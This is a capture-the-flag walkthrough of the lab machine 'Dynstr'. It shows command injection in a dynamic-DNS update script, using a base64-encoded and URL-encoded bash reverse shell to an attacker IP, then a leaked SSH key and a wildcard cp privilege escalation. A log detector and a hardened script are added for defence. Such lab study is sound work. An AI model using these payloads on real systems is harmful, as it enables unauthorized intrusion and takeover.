# DYNSTR

## Scanning

**nmap**

```
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http
```

## Enumeration

port **80**

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjZRpvEBSJaZVEVj4B%2Fimage.png?alt=media\&token=8e7e06ad-7efa-4fc6-95a5-393ff6b2aefc)

we have a beta mode

Credentials `dynadns:sndanyd`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjZcaIbLPnEwzI7gHU%2Fimage.png?alt=media\&token=26bb51fe-e3ff-4e7b-a0c1-92ff77cfba05)

email

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjZnTb0821UuDeVmsT%2Fimage.png?alt=media\&token=aeaf1cd2-f90c-46b8-a25f-dadef9705934)

**whatweb**

```
➜  ~ sudo whatweb dynstr.htb
http://dynstr.htb [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[#,dns@dyna.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.244], JQuery, Modernizr, Script[text/javascript], Title[Dyna DNS]
```

after some directory busting I found this: `http://dynstr.htb/nic/update`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjZsvyzEaom5yQHUsR%2Fimage.png?alt=media\&token=565b7e48-8064-48cc-a694-3cf490e7b074)

after some googling I found this [page](https://www.noip.com/integrate/request)

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjZvlA_wbFBXKrNlkr%2Fimage.png?alt=media\&token=1f665cd0-ccdc-440e-a592-fbd22901f97b)

let's perform this using Burp Suite ... you may get `911 [wrngdom: htb]`, so try changing the hostname

with these values

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_-DKMbQ3LYzt2Ik_%2Fimage.png?alt=media\&token=f8d4edd0-d567-4651-8878-2247b9450069)

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_1KyH5izsiWKRUDC%2Fimage.png?alt=media\&token=3fbdcdd3-831d-43e9-a04c-2c465e145faf)

## Exploit

Test the hostname parameter by adding `;` or `` ` ``

we can use backticks `` ` ` `` in the hostname param without breaking the logic

reverse shell `bash -i >& /dev/tcp/10.10.16.17/4242 0>&1`

base64 encode it to `YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNy80MjQyIDA+JjEK` so the payload does not break the script's logic

some bash to decode the payload on the target

```
`echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNy80MjQyIDA+JjEK' | base64 -d | bash`
```

sending it like that breaks the logic, so use URL encoding

```
%60%65%63%68%6f%20%27%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%69%34%78%4e%79%38%30%4d%6a%51%79%49%44%41%2b%4a%6a%45%4b%27%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%60
```

add the header `Authorization: Basic ZHluYWRuczpzbmRhbnlk` (the value is base64(dynadns:sndanyd))

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_9eiII-y9o-moSqK%2Fimage.png?alt=media\&token=fc0accfe-0eae-45ed-84d1-8ffbd8fe51da)

set up a listener and send

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_Bnk3mHZwsxWSaCq%2Fimage.png?alt=media\&token=f817a89a-c658-4ff5-9260-99d5ca4230b8)

Finally in 🎉

* [x] Service Shell Access

```
// Vuln Code
www-data@dynstr:/var/www/html/nic$ cat update
<?php
  // Check authentication
  if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']))      { echo "badauth\n"; exit; }
  if ($_SERVER['PHP_AUTH_USER'].":".$_SERVER['PHP_AUTH_PW']!=='dynadns:sndanyd') { echo "badauth\n"; exit; }

  // Set $myip from GET, defaulting to REMOTE_ADDR
  $myip = $_SERVER['REMOTE_ADDR'];
  if ($valid=filter_var($_GET['myip'],FILTER_VALIDATE_IP))                       { $myip = $valid; }

  if(isset($_GET['hostname'])) {
    // Check for a valid domain
    list($h,$d) = explode(".",$_GET['hostname'],2);
    $validds = array('dnsalias.htb','dynamicdns.htb','no-ip.htb');
    if(!in_array($d,$validds)) { echo "911 [wrngdom: $d]\n"; exit; }
    // Update DNS entry
    $cmd = sprintf("server 127.0.0.1\nzone %s\nupdate delete %s.%s\nupdate add %s.%s 30 IN A %s\nsend\n",$d,$h,$d,$h,$d,$myip);
    system('echo "'.$cmd.'" | /usr/bin/nsupdate -t 1 -k /etc/bind/ddns.key',$retval);
    // Return good or 911
    if (!$retval) {
      echo "good $myip\n";
    } else {
      echo "911 [nsupdate failed]\n"; exit;
    }
  } else {
    echo "nochg $myip\n";
  }
?>
```
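
From the defender's side, the bug above is easy to spot in the web server logs: `update` only validates the domain after the first `.`, so any other character in the label reaches `system()`. The following is an added example (not part of the original writeup) that scans constructed Apache access-log lines for `/nic/update` requests whose URL-decoded hostname holds characters a DNS label never contains; the log lines are made up for the demo.

```shell
# Added example, not from the original writeup: flag /nic/update requests
# whose hostname parameter, once URL-decoded, contains characters that a
# DNS label never has. Written in POSIX sh so it runs on the box itself.

# Decode %XX and "+" in a query value. Bytes outside printable ASCII become
# "?", so an injected newline or control byte is still reported.
urldecode() {
    s=$1; out=''
    while [ -n "$s" ]; do
        case "$s" in
            %[0-9A-Fa-f][0-9A-Fa-f]*)
                hex=${s#%}; hex=${hex%"${hex#??}"}; s=${s#???}
                if [ "$((0x$hex))" -lt 32 ] || [ "$((0x$hex))" -gt 126 ]; then
                    out="$out?"
                else
                    out="$out$(printf "\\$(printf '%03o' "$((0x$hex))")")"
                fi ;;
            +*) out="$out "; s=${s#?} ;;
            *)  out="$out${s%"${s#?}"}"; s=${s#?} ;;
        esac
    done
    printf '%s' "$out"
}

# Read log lines on stdin and print those whose decoded hostname contains
# anything outside [A-Za-z0-9.-]. Returns 0 if at least one line was flagged.
flag_nic_update() {
    hits=0
    while IFS= read -r line; do
        query=$(printf '%s\n' "$line" | sed -n 's#.*"[A-Z]* /nic/update?\([^ "]*\).*#\1#p')
        [ -n "$query" ] || continue
        hname=$(printf '%s\n' "$query" | tr '&' '\n' | sed -n 's/^hostname=//p' | head -n 1)
        [ -n "$hname" ] || continue
        case "$(urldecode "$hname")" in
            *[!A-Za-z0-9.-]*) printf '%s\n' "$line"; hits=$((hits + 1)) ;;
        esac
    done
    [ "$hits" -gt 0 ]
}

# Constructed sample log: a benign update, two injection attempts (backticks,
# an encoded newline) and an unrelated request.
SAMPLE_LOG='10.10.16.17 - dynadns [15/Jun/2021:10:00:01 +0000] "GET /nic/update?hostname=test.dnsalias.htb&myip=10.10.16.17 HTTP/1.1" 200 22
10.10.16.17 - dynadns [15/Jun/2021:10:00:05 +0000] "GET /nic/update?hostname=x%60id%60.dnsalias.htb&myip=10.10.16.17 HTTP/1.1" 200 22
10.10.16.17 - dynadns [15/Jun/2021:10:00:09 +0000] "GET /nic/update?hostname=a%0ab.no-ip.htb HTTP/1.1" 200 22
10.10.16.17 - - [15/Jun/2021:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 512'

printf '%s\n' "$SAMPLE_LOG" | flag_nic_update
```

Run against the real log with `flag_nic_update < /var/log/apache2/access.log`; only the two injection lines are printed for the sample above.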

### Getting User

there are 2 users: `bindmgr`, `dyna`

in the directory `/home/bindmgr/support-case-C62796521` we find `strace-C62796521.txt`

`cat strace-C62796521.txt`

we find a private key

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_I5vbRBFeHElrmQu%2Fimage.png?alt=media\&token=859be68f-115c-4642-96cc-88a1ab948b93)

copy it to the attacker machine

`chmod 600 pri_key`

ssh to the target is not working ....

add the IP to the DNS zone

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_KpdmwFtwyt6XeMJ%2Fimage.png?alt=media\&token=4705afa8-5fa2-4a27-99e3-cb5e042878c4)

ssh again, and it works

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_T2Yg5dxG_fEqhkY%2Fimage.png?alt=media\&token=97635b41-cc90-4b20-a99c-e64c689e7267)

* [x] USER SHELL ACCESS

## Privilege Escalation

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_Xge_3E5usIfMe4Z%2Fimage.png?alt=media\&token=d536a094-0e3e-4308-a443-1ea94403f556)

cat this script and we find this

```
bindmgr@dynstr:~$ cat /usr/local/bin/bindmgr.sh
#!/usr/bin/bash

# This script generates named.conf.bindmgr to workaround the problem
# that bind/named can only include single files but no directories.
#
# It creates a named.conf.bindmgr file in /etc/bind that can be included
# from named.conf.local (or others) and will include all files from the
# directory /etc/bin/named.bindmgr.
#
# NOTE: The script is work in progress. For now bind is not including
#       named.conf.bindmgr.
#
# TODO: Currently the script is only adding files to the directory but
#       not deleting them. As we generate the list of files to be included
#       from the source directory they won't be included anyway.

BINDMGR_CONF=/etc/bind/named.conf.bindmgr
BINDMGR_DIR=/etc/bind/named.bindmgr

indent() { sed 's/^/    /'; }

# Check versioning (.version)
echo "[+] Running $0 to stage new configuration from $PWD."
if [[ ! -f .version ]] ; then
    echo "[-] ERROR: Check versioning. Exiting."
    exit 42
fi
if [[ "`cat .version 2>/dev/null`" -le "`cat $BINDMGR_DIR/.version 2>/dev/null`" ]] ; then
    echo "[-] ERROR: Check versioning. Exiting."
    exit 43
fi

# Create config file that includes all files from named.bindmgr.
echo "[+] Creating $BINDMGR_CONF file."
printf '// Automatically generated file. Do not modify manually.\n' > $BINDMGR_CONF
for file in * ; do
    printf 'include "/etc/bind/named.bindmgr/%s";\n' "$file" >> $BINDMGR_CONF
done

# Stage new version of configuration files.
echo "[+] Staging files to $BINDMGR_DIR."
cp .version * /etc/bind/named.bindmgr/

# Check generated configuration with named-checkconf.
echo "[+] Checking staged configuration."
named-checkconf $BINDMGR_CONF >/dev/null
if [[ $? -ne 0 ]] ; then
    echo "[-] ERROR: The generated configuration is not valid. Please fix following errors: "
    named-checkconf $BINDMGR_CONF 2>&1 | indent
    exit 44
else
    echo "[+] Configuration successfully staged."
    # *** TODO *** Uncomment restart once we are live.
    # systemctl restart bind9
    if [[ $? -ne 0 ]] ; then
        echo "[-] Restart of bind9 via systemctl failed. Please check logfile: "
    systemctl status bind9
    else
    echo "[+] Restart of bind9 via systemctl succeeded."
    fi
fi
```

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_bOmMdXYoij0Npnh%2Fimage.png?alt=media\&token=dee78bd2-d99b-46bd-86be-a28b34d06692)

this part is the key: the WILDCARD 👏

> if this line looks confusing, here is the explanation ⬇️
>
> `cp [source] [source] [destination]`
>
> `cp .version * /etc/bind/named.bindmgr/`
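
The fix is as small as the bug: because the script runs `cp .version * ...` inside a directory the caller controls, a file whose name begins with `-` is read by `cp` as an option instead of a path. Below is an added example (my own hardened rewrite of the staging step, not the box's `bindmgr.sh`) that rejects such names before anything is copied and never lets a file name reach a command as a bare word; the paths are parameters so it can be tried against throwaway directories.

```shell
# Added example, not the box's bindmgr.sh: a hardened rewrite of its staging
# step. Takes SRC_DIR, DEST_DIR and CONF_FILE as parameters instead of the
# hard-coded /etc/bind paths. Returns 42 if SRC_DIR/.version is missing,
# non-numeric or not newer than the staged one, 45 if any file name is
# unsafe, 0 on success. POSIX sh.
stage_bind_config() {
    src=$1 dst=$2 conf=$3
    [ -f "$src/.version" ] || return 42
    new=$(cat "$src/.version")
    old=$(cat "$dst/.version" 2>/dev/null || echo 0)
    case $new in ''|*[!0-9]*) return 42 ;; esac
    case $old in ''|*[!0-9]*) old=0 ;; esac
    [ "$new" -gt "$old" ] || return 42

    # Validate every name before anything is written: only characters a BIND
    # config file name needs, no leading "-" or ".", regular files only.
    for f in "$src"/*; do
        [ -e "$f" ] || continue          # empty directory: the glob stays literal
        name=${f##*/}
        case $name in
            -*|.*|*[!A-Za-z0-9._-]*) echo "[-] refusing unsafe file name: $name" >&2; return 45 ;;
        esac
        [ -f "$f" ] || { echo "[-] not a regular file: $name" >&2; return 45; }
    done

    # Same include list the original builds, but only for validated names.
    mkdir -p -- "$dst"
    printf '// Automatically generated file. Do not modify manually.\n' > "$conf"
    for f in "$src"/*; do
        [ -e "$f" ] || continue
        printf 'include "%s/%s";\n' "$dst" "${f##*/}" >> "$conf"
        cp -- "$f" "$dst/"               # "--": cp option parsing stops here
    done
    cp -- "$src/.version" "$dst/"
}
```

Calling it as `stage_bind_config "$PWD" /etc/bind/named.bindmgr /etc/bind/named.conf.bindmgr` reproduces the original behaviour for a clean directory and refuses the directory the wildcard trick relies on.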

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjj_fLkbN_90brpGk9F%2Fimage.png?alt=media\&token=dd58b04d-023c-48e0-9958-56c5b9765c9f)

* [x] ROOT SHELL ACCESS

